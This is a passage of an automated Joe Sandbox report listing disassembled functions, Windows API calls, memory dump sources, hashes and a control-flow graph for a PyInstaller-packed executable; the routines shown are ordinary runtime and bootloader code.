                                                                                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF6BA3A3C55), ref: 00007FF6BA3A9175
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: bce30d106d1aea433b574043196e7eeaa4ab3af65bd301622a4049b2291cccd5
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C213231A08B5282FA549B68E8152EE63A6FF84780F4444B5EF4DD3B96DF3CD945C740

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 965 7ff6ba3bcf60-7ff6ba3bcf85 966 7ff6ba3bd253 965->966 967 7ff6ba3bcf8b-7ff6ba3bcf8e 965->967 968 7ff6ba3bd255-7ff6ba3bd265 966->968 969 7ff6ba3bcf90-7ff6ba3bcfc2 call 7ff6ba3ba814 967->969 970 7ff6ba3bcfc7-7ff6ba3bcff3 967->970 969->968 972 7ff6ba3bcffe-7ff6ba3bd004 970->972 973 7ff6ba3bcff5-7ff6ba3bcffc 970->973 975 7ff6ba3bd014-7ff6ba3bd029 call 7ff6ba3c391c 972->975 976 7ff6ba3bd006-7ff6ba3bd00f call 7ff6ba3bc320 972->976 973->969 973->972 980 7ff6ba3bd02f-7ff6ba3bd038 975->980 981 7ff6ba3bd143-7ff6ba3bd14c 975->981 976->975 980->981 984 7ff6ba3bd03e-7ff6ba3bd042 980->984 982 7ff6ba3bd1a0-7ff6ba3bd1c5 WriteFile 981->982 983 7ff6ba3bd14e-7ff6ba3bd154 981->983 985 7ff6ba3bd1d0 982->985 986 7ff6ba3bd1c7-7ff6ba3bd1cd GetLastError 982->986 987 7ff6ba3bd156-7ff6ba3bd159 983->987 988 7ff6ba3bd18c-7ff6ba3bd19e call 7ff6ba3bca18 983->988 989 7ff6ba3bd044-7ff6ba3bd04c call 7ff6ba3b47c0 984->989 990 7ff6ba3bd053-7ff6ba3bd05e 984->990 994 7ff6ba3bd1d3 985->994 986->985 995 7ff6ba3bd178-7ff6ba3bd18a call 7ff6ba3bcc38 987->995 996 7ff6ba3bd15b-7ff6ba3bd15e 987->996 1009 7ff6ba3bd130-7ff6ba3bd137 988->1009 989->990 991 7ff6ba3bd060-7ff6ba3bd069 990->991 992 7ff6ba3bd06f-7ff6ba3bd084 GetConsoleMode 990->992 991->981 991->992 998 7ff6ba3bd13c 992->998 999 7ff6ba3bd08a-7ff6ba3bd090 992->999 1001 7ff6ba3bd1d8 994->1001 995->1009 1002 7ff6ba3bd1e4-7ff6ba3bd1ee 996->1002 1003 7ff6ba3bd164-7ff6ba3bd176 call 7ff6ba3bcb1c 996->1003 998->981 1007 7ff6ba3bd119-7ff6ba3bd12b call 7ff6ba3bc5a0 999->1007 1008 7ff6ba3bd096-7ff6ba3bd099 999->1008 1010 7ff6ba3bd1dd 1001->1010 1011 7ff6ba3bd1f0-7ff6ba3bd1f5 1002->1011 1012 7ff6ba3bd24c-7ff6ba3bd251 1002->1012 1003->1009 1007->1009 1015 7ff6ba3bd0a4-7ff6ba3bd0b2 1008->1015 1016 7ff6ba3bd09b-7ff6ba3bd09e 1008->1016 1009->1001 1010->1002 1017 7ff6ba3bd223-7ff6ba3bd22d 1011->1017 1018 7ff6ba3bd1f7-7ff6ba3bd1fa 1011->1018 1012->968 1022 7ff6ba3bd110-7ff6ba3bd114 1015->1022 1023 7ff6ba3bd0b4 1015->1023 1016->1010 1016->1015 1020 7ff6ba3bd22f-7ff6ba3bd232 1017->1020 1021 7ff6ba3bd234-7ff6ba3bd243 1017->1021 1024 7ff6ba3bd213-7ff6ba3bd21e call 7ff6ba3b4ec4 1018->1024 1025 7ff6ba3bd1fc-7ff6ba3bd20b 1018->1025 1020->966 1020->1021 1021->1012 1022->994 1027 7ff6ba3bd0b8-7ff6ba3bd0cf call 7ff6ba3c39e8 1023->1027 1024->1017 1025->1024 1031 7ff6ba3bd0d1-7ff6ba3bd0dd 1027->1031 1032 7ff6ba3bd107-7ff6ba3bd10d GetLastError 1027->1032 1033 7ff6ba3bd0df-7ff6ba3bd0f1 call 7ff6ba3c39e8 1031->1033 1034 7ff6ba3bd0fc-7ff6ba3bd103 1031->1034 1032->1022 1033->1032 1038 7ff6ba3bd0f3-7ff6ba3bd0fa 1033->1038 1034->1022 1035 7ff6ba3bd105 1034->1035 1035->1027 1038->1034
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BA3BCF4B), ref: 00007FF6BA3BD07C
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BA3BCF4B), ref: 00007FF6BA3BD107
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ec586eb8924886d0c864ad17c5384adf69ef9668bb76eb356cde9310a985e9e8
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE91B432F18A5289F7A09F6D94402BD6BA2AB44BC8F9442B5DF0ED7A94DF3CD442C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3bcf7c6ed53aca5c20e386785a37e803a8de415a3a2e6e4b6f39c6d92f09cd9e
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16419F22E18B8283E7509B2895103697261FB947A4F509375EF9DC3AD2EF7CA5E08700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 335ff39f3f99ffed34338f133bd4613ad11c62b4299f03c747fc64c91a1b93d7
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0313B21E0C66785FE54ABADD4623BD67839F41384F4845B4EF0ECB2E3DE6CA8058350
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 40a0152e4c595804a861dfe87c172e011b79baa8aeede409de63d3ac8da93285
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1FD09210B18B1642EB183F785CA907C236A6F88B02F5525B8DE0BC7393EE2DA88D4300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8a0beec4657a7815b19838cc710d74aa1cf712b9ed1eef60bf7f5b2b335f6cec
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5513721B09B41A6FB289E2D948467A6293BF46BA4F884770EF7DC77D5CE3CE5008700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2e12372404bb75e630f27f2dcab915c789a23ffa6ebb811527d2b191df68c771
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66110162708B9181DA208B29A804169A362AB49FF4F984371EFBDCB7E9CF7CD4518700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3221580bd8278cb56b25abd23b60b7f4aa11875fc1124d0700f772c3282f6406
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88E08C20F19A0643FF496FFAA8451382262AF88B41F8442B0DF1DC22A1EE2C68818320
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF6BA3BA9D5,?,?,00000000,00007FF6BA3BAA8A), ref: 00007FF6BA3BABC6
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6BA3BA9D5,?,?,00000000,00007FF6BA3BAA8A), ref: 00007FF6BA3BABD0
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: c4c863d9a9f2aa53c30544939d376d09e66ce796af34c7608f5e543c0549db74
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68219321F18E8283FEA49769949537D16839F887A4FC843B9DF2EC77D2DE6CA4854300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2d5e62faf8d087b7a2871d42b9125e7fedfc88b4f3c558eacc28176e6673b9ec
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A641C132919A4587EA349F2DA64127977A2EB55B81F900372EF8EC37D1CF6CE402CB51
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b0bfe6dda5be6348f5dea9afb2976fe88cae53a5ed3d6ba0ce225c2e8636390
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5b03a73843d6e72cb3d511d342e393f99775f96de53e1b95dd61511d0c8ca11b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b0bfe6dda5be6348f5dea9afb2976fe88cae53a5ed3d6ba0ce225c2e8636390
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0221A321B18A6256FE50DA2AA9043BEE652BF45BC4F8844B0EF0DC7786DE7DE046C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
